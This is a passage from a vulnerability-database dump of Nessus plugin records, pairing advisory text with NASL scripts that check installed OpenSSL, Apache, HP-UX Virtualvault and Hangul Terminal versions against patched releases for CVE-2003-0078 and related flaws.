Transport\nLayer Security (TLS v1) protocols as well as a full-strength, general\npurpose cryptography library.\n\nIn a paper, Brice Canvel, Alain Hiltgen, Serge Vaudenay, and Martin\nVuagnoux describe and demonstrate a timing-based attack on CBC\nciphersuites in SSL and TLS. An active attacker may be able to use\ntiming observations to distinguish between two different error cases:\ncipher padding errors and MAC verification errors. Over multiple\nconnections this can leak sufficient information to be able to\nretrieve the plaintext of a common, fixed block.\n\nIn order for an attack to be sucessful an attacker must be able to act\nas a man-in-the-middle to intercept and modify multiple connections\nwhich all involve a common fixed plaintext block (such as a password),\nand have good network conditions that allow small changes in timing to\nbe reliably observed.\n\nThese updated packages contain a patch provided by the OpenSSL group\nthat corrects this vulnerability.\n\nBecause server applications are affected by these vulnerabilities, we\nadvise users to restart all services that use OpenSSL functionality or\nalternatively reboot their systems after installing these updates.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0078\"\n );\n # http://lasecwww.epfl.ch/pub/lasec/doc/Vau02a.ps\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lasec.epfl.ch/pub/lasec/doc/Vau02a.ps\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:063\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl095a\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl096\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:063\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl-0.9.6b-30.7\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i686\", reference:\"openssl-0.9.6b-30.7\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl-devel-0.9.6b-30.7\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl-perl-0.9.6b-30.7\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl095a-0.9.5a-18.7\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl096-0.9.6-13.7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-devel / openssl-perl / openssl095a / openssl096\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:11:44", "description": "In an upcoming paper, Brice Canvel (EPFL), Alain Hiltgen (UBS), Serge Vaudenay (EPFL), and Martin Vuagnoux (EPFL, Ilion) describe and demonstrate a timing-based attack on CBC ciphersuites in SSL and TLS.\n\nNew versions of openssl have been released in response to this vulnerability (0.9.6i and 0.9.7a). The openssl released with Linux-Mandrake 7.2 and Single Network Firewall 7.2 has been patched to correct this issue.", "cvss3": {}, "published": "2004-07-31T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : openssl (MDKSA-2003:020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0078"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libopenssl0", "p-cpe:/a:mandriva:linux:libopenssl0-devel", "p-cpe:/a:mandriva:linux:libopenssl0-static-devel", "p-cpe:/a:mandriva:linux:openssl", "p-cpe:/a:mandriva:linux:openssl-devel", "cpe:/o:mandrakesoft:mandrake_linux:7.2", "cpe:/o:mandrakesoft:mandrake_linux:8.0", "cpe:/o:mandrakesoft:mandrake_linux:8.1", "cpe:/o:mandrakesoft:mandrake_linux:8.2", "cpe:/o:mandrakesoft:mandrake_linux:9.0"], "id": "MANDRAKE_MDKSA-2003-020.NASL", "href": "https://www.tenable.com/plugins/nessus/14005", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:020. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14005);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0078\");\n script_xref(name:\"MDKSA\", value:\"2003:020\");\n\n script_name(english:\"Mandrake Linux Security Advisory : openssl (MDKSA-2003:020)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In an upcoming paper, Brice Canvel (EPFL), Alain Hiltgen (UBS), Serge\nVaudenay (EPFL), and Martin Vuagnoux (EPFL, Ilion) describe and\ndemonstrate a timing-based attack on CBC ciphersuites in SSL and TLS.\n\nNew versions of openssl have been released in response to this\nvulnerability (0.9.6i and 0.9.7a). The openssl released with\nLinux-Mandrake 7.2 and Single Network Firewall 7.2 has been patched to\ncorrect this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20030219.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"openssl-0.9.5a-9.4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"openssl-devel-0.9.5a-9.4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"openssl-0.9.6i-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"openssl-devel-0.9.6i-1.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"libopenssl0-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"libopenssl0-devel-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"libopenssl0-static-devel-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"openssl-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"libopenssl0-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"libopenssl0-devel-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"libopenssl0-static-devel-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"openssl-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libopenssl0-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libopenssl0-devel-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libopenssl0-static-devel-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"openssl-0.9.6i-1.2mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T16:14:18", "description": "s700_800 11.04 Virtualvault 4.6 OWS update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A remotely exploitable potential vulnerability has been reported in CAN-2003-0078.\n\n - #1 A defect in the Java(TM) Virtual Machine may allow illegal access to protected fields or methods of an object. #2 The Java(TM) Secure Socket Extension (JSSE) may incorrectly validate the digital certificate of a web site. In addition, the Java Plug-in and Java Web Start may incorrectly validate the digital certificates of signed JAR files.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_28686 : s700_800 11.04 Virtualvault 4.6 OWS update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0078"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_28686.NASL", "href": "https://www.tenable.com/plugins/nessus/17497", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_28686. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17497);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0078\");\n script_xref(name:\"HP\", value:\"HPSBUX0301\");\n script_xref(name:\"HP\", value:\"HPSBUX0303\");\n script_xref(name:\"HP\", value:\"SSRT3467\");\n script_xref(name:\"HP\", value:\"SSRT3521\");\n\n script_name(english:\"HP-UX PHSS_28686 : s700_800 11.04 Virtualvault 4.6 OWS update\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.6 OWS update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A remotely exploitable potential vulnerability has been\n reported in CAN-2003-0078.\n\n - #1 A defect in the Java(TM) Virtual Machine may allow\n illegal access to protected fields or methods of an\n object. #2 The Java(TM) Secure Socket Extension (JSSE)\n may incorrectly validate the digital certificate of a\n web site. In addition, the Java Plug-in and Java Web\n Start may incorrectly validate the digital certificates\n of signed JAR files.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_28686 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/05/01\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2003/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_28686 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_28686\", \"PHSS_29546\", \"PHSS_29691\", \"PHSS_30154\", \"PHSS_30405\", \"PHSS_30645\", \"PHSS_30947\", \"PHSS_31057\", \"PHSS_31826\", \"PHSS_32183\", \"PHSS_33397\", \"PHSS_34120\", \"PHSS_35108\", \"PHSS_35462\", \"PHSS_35557\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-CORE-CMN\", version:\"A.04.60\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-GUI\", version:\"A.04.60\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-JAVA\", version:\"A.04.60\")) flag++;\nif (hpux_check_patch(app:\"VaultWS.WS-CORE\", version:\"A.04.60\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:10:59", "description": "The target is running an Apache web server that allows for the injection of arbitrary escape sequences into its error logs. An attacker might use this vulnerability in an attempt to exploit similar vulnerabilities in terminal emulators.\n\n***** Nessus has determined the vulnerability exists only by looking at ***** the Server header returned by the web server running on the target.", "cvss3": {}, "published": "2004-05-17T00:00:00", "type": "nessus", "title": "Apache < 1.3.31 / 2.0.49 Log Entry Terminal Escape Sequence Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_LOG_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/12239", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by George A. Theall, <theall@tifaware.com>.\n#\n# See the Nessus Scripts License for details.\n#\n\n# Changes by Tenable:\n# - Standardized title (4/2/2009)\n# - Added Synopsis, See Also, CVSS Vector (4/9/2009)\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12239);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/15\");\n\n script_cve_id(\"CVE-2003-0020\");\n script_bugtraq_id(9930);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2004-05-03\");\n script_xref(name:\"CLSA\", value:\"CLSA-2004\");\n script_xref(name:\"HPSB\", value:\"HPSBUX01022\");\n script_xref(name:\"MDKSA\", value:\"MDKSA-2003\");\n script_xref(name:\"RHSA\", value:\"2003:082\");\n script_xref(name:\"RHSA\", value:\"2003:083\");\n script_xref(name:\"RHSA\", value:\"2003:104\");\n script_xref(name:\"RHSA\", value:\"2003:139\");\n script_xref(name:\"RHSA\", value:\"2003:243\");\n script_xref(name:\"RHSA\", value:\"2003:244\");\n script_xref(name:\"SSA\", value:\"SSA\");\n script_xref(name:\"SuSE\", value:\"SuSE-SA\");\n script_xref(name:\"TLSA\", value:\"TLSA-2004-11\");\n script_xref(name:\"TSLSA\", value:\"TSLSA-2004-0017\");\n script_xref(name:\"SECUNIA\", value:\"11681\");\n script_xref(name:\"SECUNIA\", value:\"11719\");\n script_xref(name:\"SECUNIA\", value:\"12246\");\n script_xref(name:\"SECUNIA\", value:\"11859\");\n script_xref(name:\"SECUNIA\", value:\"11705\");\n script_xref(name:\"OPENPKG-SA\", value:\"OpenPKG-SA-2004.021-apache\");\n\n script_name(english:\"Apache < 1.3.31 / 2.0.49 Log Entry Terminal Escape Sequence Injection\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a log injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The target is running an Apache web server that allows for the\ninjection of arbitrary escape sequences into its error logs. An\nattacker might use this vulnerability in an attempt to exploit similar\nvulnerabilities in terminal emulators.\n\n***** Nessus has determined the vulnerability exists only by looking\nat ***** the Server header returned by the web server running on the\ntarget.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 1.3.31 or 2.0.49 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/05/17\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2022 George A. Theall\");\n\n script_dependencies(\"find_service1.nasl\", \"global_settings.nasl\", \"http_version.nasl\", \"redhat-RHSA-2003-244.nasl\", \"redhat_fixes.nasl\", \"macosx_SecUpd20040503.nasl\", \"macosx_SecUpd20040126.nasl\", \"macosx_SecUpd20041202.nasl\");\n script_require_keys(\"www/apache\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"backport.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nhost = get_host_name();\nport = get_http_port(default:80, embedded:TRUE);\ndbg::detailed_log(lvl:2, msg:\"debug: checking for Apache Error Log Escape Sequence Injection vulnerability on \"+host+\":\"+port+\".\");\n\nif (!get_port_state(port)) exit(0);\nif (get_kb_item(\"CVE-2003-0020\") || get_kb_item(\"RHSA-2003-244\")) exit(0);\n\n# Check the web server's banner for the version.\nbanner = get_http_banner(port: port);\nif (!banner) exit(0);\nbanner = get_backport_banner(banner:banner);\n\nsig = strstr(banner, \"Server:\");\nif (!sig) exit(0);\ndbg::detailed_log(lvl:2, msg:\"debug: server sig = >>\"+sig+\"<<.\");\n\n# For affected versions of Apache, see:\n# - http://www.apacheweek.com/features/security-13\n# - http://www.apacheweek.com/features/security-20\nif(ereg(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/(1\\.([0-2]\\.[0-9]|3\\.([0-9][^0-9]|[0-2][0-9]))|2\\.0.([0-9][^0-9]|[0-3][0-9]|4[0-8]))\", string:sig)) {\n security_warning(port);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:34:22", "description": "Updated Hangul Terminal packages fix two security issues.\n\nHangul Terminal is a terminal emulator for the X Window System, based on Xterm.\n\nHangul Terminal provides an escape sequence for reporting the current window title, which essentially takes the current title and places it directly on the command line. An attacker can craft an escape sequence that sets the window title of a victim using Hangul Terminal to an arbitrary command and then report it to the command line. Since it is not possible to embed a carriage return into the window title the attacker would then have to convince the victim to press Enter for it to process the title as a command, although the attacker could craft other escape sequences that might convince the victim to do so.\n\nIt is possible to lock up Hangul Terminal before version 2.0.5 by sending an invalid DEC UDK escape sequence.\n\nUsers are advised to upgrade to these erratum packages, which contain Hangul Terminal version 2.0.5 which is not vulnerable to these issues.", "cvss3": {}, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "RHEL 2.1 : hanterm-xf (RHSA-2003:071)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0077", "CVE-2003-0079"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:hanterm-xf", "cpe:/o:redhat:enterprise_linux:2.1"], "id": "REDHAT-RHSA-2003-071.NASL", "href": "https://www.tenable.com/plugins/nessus/12371", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:071. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12371);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0077\", \"CVE-2003-0079\");\n script_bugtraq_id(6944, 6946);\n script_xref(name:\"RHSA\", value:\"2003:071\");\n\n script_name(english:\"RHEL 2.1 : hanterm-xf (RHSA-2003:071)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Hangul Terminal packages fix two security issues.\n\nHangul Terminal is a terminal emulator for the X Window System, based\non Xterm.\n\nHangul Terminal provides an escape sequence for reporting the current\nwindow title, which essentially takes the current title and places it\ndirectly on the command line. An attacker can craft an escape sequence\nthat sets the window title of a victim using Hangul Terminal to an\narbitrary command and then report it to the command line. Since it is\nnot possible to embed a carriage return into the window title the\nattacker would then have to convince the victim to press Enter for it\nto process the title as a command, although the attacker could craft\nother escape sequences that might convince the victim to do so.\n\nIt is possible to lock up Hangul Terminal before version 2.0.5 by\nsending an invalid DEC UDK escape sequence.\n\nUsers are advised to upgrade to these erratum packages, which contain\nHangul Terminal version 2.0.5 which is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0079\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:071\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected hanterm-xf package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hanterm-xf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver 